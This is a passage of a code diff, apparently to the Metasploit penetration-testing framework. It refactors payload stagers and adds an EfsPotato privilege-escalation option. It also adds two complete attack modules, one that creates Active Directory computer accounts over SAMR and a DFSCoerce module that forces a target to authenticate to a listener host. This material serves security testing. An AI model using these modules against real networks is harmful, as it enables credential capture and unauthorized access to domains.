+        # an encoder might be needed
+        call_function("pg_read_binary_file('#{fpath}')")
+      else
+        call_function("pg_read_file('#{fpath}')")
+      end
+    end
+
     private
 
     #

lib/msf/core/payload.rb

@@ -59,10 +59,10 @@ class Payload < Msf::Module
     #
     self.module_info['Dependencies'] = self.module_info['Dependencies'] || []
 
-    # If this is a staged payload but there is no stage information,
+    # If this is an adapted or staged payload but there is no stage information,
     # then this is actually a stager + single combination.  Set up the
     # information hash accordingly.
-    if self.class.include?(Msf::Payload::Single) and
+    if (self.class.include?(Msf::Payload::Adapter) || self.class.include?(Msf::Payload::Single)) and
       self.class.include?(Msf::Payload::Stager)
       self.module_info['Stage'] = {}
 
@@ -288,7 +288,7 @@ class Payload < Msf::Module
   #
   # Generates the payload and returns the raw buffer to the caller.
   #
-  def generate
+  def generate(_opts = {})
     internal_generate
   end
 

lib/msf/core/payload/generic.rb

@@ -43,7 +43,7 @@ module Payload::Generic
   # the actual payload in case settings have changed.  Other methods will
   # use the cached version if possible.
   #
-  def generate
+  def generate(_opts = {})
     reset
 
     redirect_to_actual(:generate)

lib/msf/core/payload/linux/bind_tcp.rb

@@ -19,7 +19,7 @@ module Payload::Linux::BindTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:     datastore['LPORT'],
       reliable: false

lib/msf/core/payload/linux/reverse_tcp_x86.rb

@@ -18,7 +18,7 @@ module Payload::Linux::ReverseTcp_x86
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:          datastore['LPORT'],
       host:          datastore['LHOST'],

lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb

@@ -17,7 +17,7 @@ module Payload::Linux::ReverseTcp_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

lib/msf/core/payload/php/bind_tcp.rb

@@ -17,7 +17,7 @@ module Payload::Php::BindTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port: datastore['LPORT']
     }

lib/msf/core/payload/php/reverse_tcp.rb

@@ -17,7 +17,7 @@ module Payload::Php::ReverseTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

lib/msf/core/payload/python/bind_tcp.rb

@@ -16,7 +16,7 @@ module Payload::Python::BindTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port: datastore['LPORT']
     }

lib/msf/core/payload/python/reverse_tcp.rb

@@ -21,7 +21,7 @@ module Payload::Python::ReverseTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

lib/msf/core/payload/python/reverse_tcp_ssl.rb

@@ -20,7 +20,7 @@ module Payload::Python::ReverseTcpSsl
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

lib/msf/core/payload/single.rb

@@ -23,7 +23,7 @@ module Msf::Payload::Single
   # return the stager.  When a stager is not used, generate will return the
   # single payload
   #
-  def generate
+  def generate(_opts = {})
     # If we're staged, then we call the super to generate the STAGER
     if staged?
       super

lib/msf/core/payload/windows/bind_named_pipe.rb

@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       name:        datastore['PIPENAME'],
       host:        datastore['PIPEHOST'],

lib/msf/core/payload/windows/bind_tcp.rb

@@ -21,7 +21,7 @@ module Payload::Windows::BindTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:     datastore['LPORT'],
       reliable: false

lib/msf/core/payload/windows/bind_tcp_rc4.rb

@@ -17,7 +17,7 @@ module Payload::Windows::BindTcpRc4
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:     datastore['LPORT'],

lib/msf/core/payload/windows/encrypted_reverse_tcp.rb

@@ -61,9 +61,9 @@ module Payload::Windows::EncryptedReverseTcp
 
     src = ''
     if staged?
-      src = generate_stager(conf)
+      src = generate_stager(conf, opts)
     else
-      src = generate_c_src(conf)
+      src = generate_c_src(conf, opts)
     end
 
     link_script = module_info['DefaultOptions']['LinkerScript']
@@ -76,7 +76,7 @@ module Payload::Windows::EncryptedReverseTcp
       keep_exe:      datastore['KeepExe'],
       show_compile_cmd: datastore['ShowCompileCMD'],
       f_name:        Tempfile.new(staged? ? 'reverse_pic_stager' : 'reverse_pic_stageless').path,
-      arch:          self.arch_to_s
+      arch:          opts.fetch(:arch, self.arch_to_s)
     }
 
     comp_code = get_compiled_shellcode(src, compile_opts)
@@ -92,9 +92,9 @@ module Payload::Windows::EncryptedReverseTcp
     comp_code
   end
 
-  def initial_code
+  def initial_code(conf, opts = {})
     src = headers
-    src << align_rsp if self.arch_to_s.eql?('x64')
+    src << align_rsp if opts.fetch(:arch, self.arch_to_s).eql?('x64')
 
     if staged?
       src << chacha_func_staged
@@ -104,8 +104,8 @@ module Payload::Windows::EncryptedReverseTcp
     src << exit_proc
   end
 
-  def generate_stager(conf)
-    src = initial_code
+  def generate_stager(conf, opts = {})
+    src = initial_code(conf, opts)
 
     if conf[:call_wsastartup]
       src << init_winsock
@@ -115,7 +115,7 @@ module Payload::Windows::EncryptedReverseTcp
     src << get_load_library(conf[:host], conf[:port])
     src << call_init_winsock if conf[:call_wsastartup]
     src << start_comm(conf[:uuid])
-    src << stager_comm
+    src << stager_comm(conf, opts)
   end
 
   def sends_hex_uuid?
@@ -148,21 +148,21 @@ module Payload::Windows::EncryptedReverseTcp
       keep_exe:      datastore['KeepExe'],
       show_compile_cmd: datastore['ShowCompileCMD'],
       f_name:        Tempfile.new('reverse_pic_stage').path,
-      arch:          self.arch_to_s
+      arch:          opts.fetch(:arch, self.arch_to_s)
     }
 
-    src = initial_code
+    src = initial_code(conf, opts)
     src << get_new_key
     src << init_proc
-    src << exec_payload_stage
+    src << exec_payload_stage(conf, opts)
     shellcode = get_compiled_shellcode(src, comp_opts)
 
     stage_obj = Rex::Crypto::Chacha20.new(key, iv)
     stage_obj.chacha20_crypt(shellcode)
   end
 
-  def generate_c_src(conf)
-    src = initial_code
+  def generate_c_src(conf, opts = {})
+    src = initial_code(conf, opts)
 
     if conf[:call_wsastartup]
       src << init_winsock
@@ -552,9 +552,10 @@ module Payload::Windows::EncryptedReverseTcp
     ^
   end
 
-  def stager_comm
-    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+  def stager_comm(conf, opts = {})
+    arch = opts.fetch(:arch, self.arch_to_s)
+    reg = arch.eql?('x86') ? 'edi' : 'rdi'
+    inst = arch.eql?('x86') ? 'movl' : 'movq'
 
     %Q^
         FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
@@ -596,9 +597,10 @@ module Payload::Windows::EncryptedReverseTcp
     ^
   end
 
-  def exec_payload_stage
-    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+  def exec_payload_stage(conf, opts = {})
+    arch = opts.fetch(:arch, self.arch_to_s)
+    reg = arch.eql?('x86') ? 'edi' : 'rdi'
+    inst = arch.eql?('x86') ? 'movl' : 'movq'
 
     %Q^
      void ExecutePayload()

lib/msf/core/payload/windows/exec.rb

@@ -57,7 +57,7 @@ module Payload::Windows::Exec
   #
   # Constructs the payload
   #
-  def generate
+  def generate(_opts = {})
     return super + command_string + "\x00"
   end
 

lib/msf/core/payload/windows/exec_x64.rb

@@ -53,7 +53,7 @@ module Payload::Windows::Exec_x64
       ], self.class )
   end
 
-  def generate
+  def generate(_opts = {})
     return super + command_string + "\x00"
   end
 

lib/msf/core/payload/windows/load_library.rb

@@ -57,7 +57,7 @@ module Payload::Windows::LoadLibrary
   #
   # Constructs the payload
   #
-  def generate
+  def generate(_opts = {})
     return super + dll_string + "\x00"
   end
 

lib/msf/core/payload/windows/pe_inject.rb

@@ -67,8 +67,9 @@ module Msf
   module Payload::Windows::PEInject
     def initialize(info = {})
       super
+
       register_options([
-        OptInjectablePE.new('PE', [ true, 'The local path to the PE file to upload' ], arch: arch.first)
+        OptInjectablePE.new('PE', [ true, 'The local path to the PE file to upload' ], arch: info.fetch('AdaptedArch', arch.first))
       ], self.class)
     end
 
@@ -83,7 +84,7 @@ module Msf
     # Transmits the reflective PE payload to the remote
     # computer so that it can be loaded into memory.
     #
-    def handle_connection(conn, _opts = {})
+    def handle_connection(conn, opts = {})
       data = ''
       begin
         File.open(pe_path, 'rb') do |f|
@@ -96,7 +97,7 @@ module Msf
       end
 
       print_status('Premapping PE file...')
-      pe_map = create_pe_memory_map(data)
+      pe_map = create_pe_memory_map(data, opts)
       print_status("Mapped PE size #{pe_map[:bytes].length}")
       opts = {}
       opts[:is_dll] = pe_map[:is_dll]
@@ -113,10 +114,10 @@ module Msf
       conn.close
     end
 
-    def create_pe_memory_map(file)
+    def create_pe_memory_map(file, opts = {})
       pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(file))
       begin
-        OptInjectablePE.assert_compatible(pe, arch.first)
+        OptInjectablePE.assert_compatible(pe, opts.fetch(:arch, arch.first))
       rescue Msf::ValidationError => e
         print_error("PE validation error: #{e.message}")
         raise

lib/msf/core/payload/windows/reverse_named_pipe.rb

@@ -26,7 +26,7 @@ module Payload::Windows::ReverseNamedPipe
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       name:        datastore['PIPENAME'],
       host:        datastore['PIPEHOST'] || '.',

lib/msf/core/payload/windows/reverse_tcp_dns.rb

@@ -25,7 +25,7 @@ module Payload::Windows::ReverseTcpDns
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

lib/msf/core/payload/windows/reverse_tcp_rc4.rb

@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:        datastore['LPORT'],

lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb

@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4Dns
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:        datastore['LPORT'],

lib/msf/core/payload/windows/reverse_udp.rb

@@ -16,7 +16,7 @@ module Payload::Windows::ReverseUdp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

lib/msf/core/payload/windows/reverse_win_https.rb

@@ -29,7 +29,7 @@ module Payload::Windows::ReverseWinHttps
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                          datastore['HandlerSSLCert'])

lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb

@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       name:        datastore['PIPENAME'],
       host:        datastore['PIPEHOST'],

lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb

@@ -16,7 +16,7 @@ module Payload::Windows::BindTcpRc4_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:        datastore['LPORT'],

lib/msf/core/payload/windows/x64/bind_tcp_x64.rb

@@ -19,7 +19,7 @@ module Payload::Windows::BindTcp_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:     datastore['LPORT'],
       reliable: false

lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb

@@ -25,7 +25,7 @@ module Payload::Windows::ReverseNamedPipe_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       name:        datastore['PIPENAME'],
       host:        datastore['PIPEHOST'],

lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb

@@ -16,7 +16,7 @@ module Payload::Windows::ReverseTcpRc4_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:        datastore['LPORT'],

lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb

@@ -26,7 +26,7 @@ module Payload::Windows::ReverseTcp_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

lib/msf/core/payload/windows/x64/reverse_win_https_x64.rb

@@ -28,7 +28,7 @@ module Payload::Windows::ReverseWinHttps_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                          datastore['HandlerSSLCert'])

lib/rex/post/meterpreter/extensions/priv/priv.rb

@@ -30,7 +30,8 @@ class Priv < Extension
     named_pipe_2: 2,
     token_dup: 3,
     named_pipe_rpcss: 4,
-    named_pipe_print_spooler: 5
+    named_pipe_print_spooler: 5,
+    named_pipe_efs: 6
   }.freeze
 
   #

lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb

@@ -63,15 +63,15 @@ class Process < Rex::Post::Process
       perms = PROCESS_ALL
     end
 
-    if (perms & PROCESS_READ)
+    if (perms & PROCESS_READ) > 0
       real_perms |= PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION
     end
 
-    if (perms & PROCESS_WRITE)
+    if (perms & PROCESS_WRITE) > 0
       real_perms |= PROCESS_SET_SESSIONID | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE | PROCESS_SET_QUOTA | PROCESS_SET_INFORMATION
     end
 
-    if (perms & PROCESS_EXECUTE)
+    if (perms & PROCESS_EXECUTE) > 0
       real_perms |= PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_CREATE_PROCESS | PROCESS_SUSPEND_RESUME
     end
 

lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb

@@ -24,6 +24,7 @@ class Console::CommandDispatcher::Priv::Elevate
   ELEVATE_TECHNIQUE_SERVICE_TOKENDUP        = 3
   ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE_RPCSS = 4
   ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER  = 5
+  ELEVATE_TECHNIQUE_NAMEDPIPE_EFS           = 6
 
   ELEVATE_TECHNIQUE_DESCRIPTION =
     [
@@ -32,7 +33,8 @@ class Console::CommandDispatcher::Priv::Elevate
       'Named Pipe Impersonation (Dropper/Admin)',
       'Token Duplication (In Memory/Admin)',
       'Named Pipe Impersonation (RPCSS variant)',
-      'Named Pipe Impersonation (PrintSpooler variant)'
+      'Named Pipe Impersonation (PrintSpooler variant)',
+      'Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)'
     ]
 
   #

metasploit-framework.gemspec

@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.93'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.94'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.18'
   # Needed by msfgui and other rpc components

modules/auxiliary/admin/dcerpc/samr_computer.rb

@@ -0,0 +1,249 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'ruby_smb/dcerpc/client'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SAMR Computer Management',
+        'Description' => %q{
+          Add, lookup and delete computer accounts via MS-SAMR. By default
+          standard active directory users can add up to 10 new computers to the
+          domain. Administrative privileges however are required to delete the
+          created accounts.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'JaGoTu', # @jagotu Original Impacket code
+          'Spencer McIntyre',
+        ],
+        'References' => [
+          ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py'],
+        ],
+        'Notes' => {
+          'Reliability' => [],
+          'Stability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Actions' => [
+          [ 'ADD_COMPUTER', { 'Description' => 'Add a computer account' } ],
+          [ 'DELETE_COMPUTER', { 'Description' => 'Delete a computer account' } ],
+          [ 'LOOKUP_COMPUTER', { 'Description' => 'Lookup a computer account' } ]
+        ],
+        'DefaultAction' => 'ADD_COMPUTER'
+      )
+    )
+
+    register_options([
+      OptString.new('COMPUTER_NAME', [ false, 'The computer name' ]),
+      OptString.new('COMPUTER_PASSWORD', [ false, 'The password for the new computer' ], conditions: %w[ACTION == ADD_COMPUTER]),
+      Opt::RPORT(445)
+    ])
+  end
+
+  def connect_samr
+    vprint_status('Connecting to Security Account Manager (SAM) Remote Protocol')
+    samr = @tree.open_file(filename: 'samr', write: true, read: true)
+
+    vprint_status('Binding to \\samr...')
+    samr.bind(endpoint: RubySMB::Dcerpc::Samr)
+    vprint_good('Bound to \\samr')
+
+    samr
+  end
+
+  def run
+    begin
+      connect
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
+    report_service(
+      host: rhost,
+      port: rport,
+      host_name: simple.client.default_name,
+      proto: 'tcp',
+      name: 'smb',
+      info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
+    )
+
+    begin
+      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    rescue RubySMB::Error::RubySMBError => e
+      fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
+    end
+
+    begin
+      @samr = connect_samr
+      @server_handle = @samr.samr_connect
+    rescue RubySMB::Dcerpc::Error::FaultError => e
+      elog(e.message, error: e)
+      fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")
+    end
+
+    if datastore['SMBDomain'].blank? || datastore['SMBDomain'] == '.'
+      all_domains = @samr.samr_enumerate_domains_in_sam_server(server_handle: @server_handle).map(&:to_s).map(&:encode)
+      all_domains.delete('Builtin')
+      if all_domains.empty?
+        fail_with(Failure::NotFound, 'No domains were found on the SAM server.')
+      elsif all_domains.length > 1
+        print_status("Enumerated domains: #{all_domains.join(', ')}")
+        fail_with(Failure::BadConfig, 'The SAM server has more than one domain, the target must be specified.')
+      end
+
+      @domain_name = all_domains.first
+      print_status("Using automatically identified domain: #{@domain_name}")
+    else
+      @domain_name = datastore['SMBDomain']
+    end
+
+    @domain_sid = @samr.samr_lookup_domain(server_handle: @server_handle, name: @domain_name)
+    @domain_handle = @samr.samr_open_domain(server_handle: @server_handle, domain_id: @domain_sid)
+    send("action_#{action.name.downcase}")
+  rescue RubySMB::Dcerpc::Error::DcerpcError => e
+    elog(e.message, error: e)
+    fail_with(Failure::UnexpectedReply, e.message)
+  rescue RubySMB::Error::RubySMBError
+    elog(e.message, error: e)
+    fail_with(Failure::Unknown, e.message)
+  end
+
+  def random_hostname(prefix: 'DESKTOP')
+    "#{prefix}-#{Rex::Text.rand_base(8, '', ('A'..'Z').to_a + ('0'..'9').to_a)}$"
+  end
+
+  def action_add_computer
+    if datastore['COMPUTER_NAME'].blank?
+      computer_name = random_hostname
+      4.downto(0) do |attempt|
+        break if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ]).nil?
+
+        computer_name = random_hostname
+        fail_with(Failure::BadConfig, 'Could not find an unused computer name.') if attempt == 0
+      end
+    else
+      computer_name = datastore['COMPUTER_NAME']
+      if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+        fail_with(Failure::BadConfig, 'The specified computer name already exists.')
+      end
+    end
+
+    result = @samr.samr_create_user2_in_domain(
+      domain_handle: @domain_handle,
+      name: computer_name,
+      account_type: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT,
+      desired_access: RubySMB::Dcerpc::Samr::USER_FORCE_PASSWORD_CHANGE | RubySMB::Dcerpc::Samr::MAXIMUM_ALLOWED
+    )
+
+    user_handle = result[:user_handle]
+    if datastore['COMPUTER_PASSWORD'].blank?
+      password = Rex::Text.rand_text_alphanumeric(32)
+    else
+      password = datastore['COMPUTER_PASSWORD']
+    end
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_INTERNAL4_INFORMATION_NEW,
+      member: RubySMB::Dcerpc::Samr::SamprUserInternal4InformationNew.new(
+        i1: {
+          password_expired: 1,
+          which_fields: RubySMB::Dcerpc::Samr::USER_ALL_NTPASSWORDPRESENT | RubySMB::Dcerpc::Samr::USER_ALL_PASSWORDEXPIRED
+        },
+        user_password: {
+          buffer: RubySMB::Dcerpc::Samr::SamprEncryptedUserPasswordNew.encrypt_password(
+            password,
+            @simple.client.application_key
+          )
+        }
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_CONTROL_INFORMATION,
+      member: RubySMB::Dcerpc::Samr::UserControlInformation.new(
+        user_account_control: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+    print_good("Successfully created #{@domain_name}\\#{computer_name} with password #{password}")
+    report_creds(@domain_name, computer_name, password)
+  end
+
+  def action_delete_computer
+    fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
+    computer_name = datastore['COMPUTER_NAME']
+
+    details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+    fail_with(Failure::BadConfig, 'The specified computer was not found.') if details.nil?
+    details = details[computer_name]
+
+    handle = @samr.samr_open_user(domain_handle: @domain_handle, user_id: details[:rid])
+    @samr.samr_delete_user(user_handle: handle)
+    print_good('The specified computer has been deleted.')
+  end
+
+  def action_lookup_computer
+    fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
+    computer_name = datastore['COMPUTER_NAME']
+
+    details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+    if details.nil?
+      print_error('The specified computer was not found.')
+      return
+    end
+    details = details[computer_name]
+    sid = @samr.samr_rid_to_sid(object_handle: @domain_handle, rid: details[:rid]).to_s
+    print_good("Found #{@domain_name}\\#{computer_name} (SID: #{sid})")
+  end
+
+  def report_creds(domain, username, password)
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: username,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: domain
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+end

modules/auxiliary/gather/memcached_extractor.rb

@@ -54,12 +54,13 @@ class MetasploitModule < Msf::Auxiliary
   def enumerate_keys
     keys = []
     enumerate_slab_ids.each do |sid|
+      sock.send("stats cachedump #{sid} #{max_keys}\r\n", 0)
       loop do
-        sock.send("stats cachedump #{sid} #{max_keys}\r\n", 0)
         data = sock.recv(4096)
-        break if !data || data.length == 0 || data == "END\r\n"
+        break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
         matches = data.scan(/^ITEM (?<key>.*) \[/)
-        keys = keys + matches.flatten! if matches
+        break if matches.empty?
+        keys = keys + matches.flatten!
         break if data =~ /^END/
       end
     end
@@ -86,9 +87,10 @@ class MetasploitModule < Msf::Auxiliary
     sock.send("lru_crawler metadump all\r\n", 0)
     loop do
       data = sock.recv(4096)
-      break if !data || data.length == 0 || data == "END\r\n"
+      break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
       matches = data.scan(/^key=(?<key>.*) exp=/)
-      keys = keys + matches.flatten! if matches
+      break if matches.empty?
+      keys = keys + matches.flatten!
       break if data =~ /^END/
       data = ''
     end

modules/auxiliary/scanner/dcerpc/dfscoerce.rb

@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'windows_error'
+require 'ruby_smb'
+require 'ruby_smb/error'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Auxiliary::Scanner
+
+  Dfsnm = RubySMB::Dcerpc::Dfsnm
+
+  METHODS = %w[NetrDfsAddStdRoot NetrDfsRemoveStdRoot].freeze
+
+  def initialize
+    super(
+      'Name' => 'DFSCoerce',
+      'Description' => %q{
+        Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+      },
+      'Author' => [
+        'Wh04m1001',
+        'xct_de',
+        'Spencer McIntyre'
+      ],
+      'References' => [
+        [ 'URL', 'https://github.com/Wh04m1001/DFSCoerce' ]
+      ],
+      'License' => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        OptString.new('LISTENER', [ true, 'The host listening for the incoming connection', Rex::Socket.source_address ]),
+        OptEnum.new('METHOD', [ true, 'The RPC method to use for triggering', 'Automatic', ['Automatic'] + METHODS ])
+      ]
+    )
+  end
+
+  def connect_dfsnm
+    vprint_status('Connecting to Distributed File System (DFS) Namespace Management Protocol')
+    netdfs = @tree.open_file(filename: 'netdfs', write: true, read: true)
+
+    vprint_status('Binding to \\netdfs...')
+    netdfs.bind(endpoint: RubySMB::Dcerpc::Dfsnm)
+    vprint_good('Bound to \\netdfs')
+
+    netdfs
+  end
+
+  def run_host(_ip)
+    begin
+      connect
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
+
+    begin
+      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    rescue RubySMB::Error::RubySMBError => e
+      fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
+    end
+
+    begin
+      dfsnm = connect_dfsnm
+    rescue RubySMB::Error::UnexpectedStatusCode => e
+      if e.status_code == ::WindowsError::NTStatus::STATUS_ACCESS_DENIED
+        fail_with(Failure::NoAccess, 'Connection failed (STATUS_ACCESS_DENIED)')
+      end
+
+      fail_with(Failure::UnexpectedReply, "Connection failed (#{e.status_code.name})")
+    rescue RubySMB::Dcerpc::Error::FaultError => e
+      elog(e.message, error: e)
+      fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")
+    end
+
+    begin
+      case datastore['METHOD']
+      when 'NetrDfsAddStdRoot'
+        dfsnm.netr_dfs_add_std_root(datastore['LISTENER'], 'share', comment: Faker::Hacker.say_something_smart)
+      when 'NetrDfsRemoveStdRoot', 'Automatic'
+        # use this technique by default, it's the original and doesn't require a comment
+        dfsnm.netr_dfs_remove_std_root(datastore['LISTENER'], 'share')
+      end
+    rescue RubySMB::Dcerpc::Error::DfsnmError => e
+      case e.status_code
+      when ::WindowsError::Win32::ERROR_ACCESS_DENIED
+        # this should be the response even if LISTENER captured the credentials (MSF, Responder, etc.)
+        print_good('Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful')
+      when ::WindowsError::Win32::ERROR_BAD_NETPATH
+        # this should be the response even if LISTENER was inaccessible
+        print_good('Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful')
+      else
+        print_status("Server responded with #{e.status_code.name} (#{e.status_code.description})")
+      end
+    end
+  end
+end

modules/auxiliary/scanner/dcerpc/petitpotam.rb

@@ -66,8 +66,17 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(_ip)
-    connect
-    smb_login
+    begin
+      connect
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
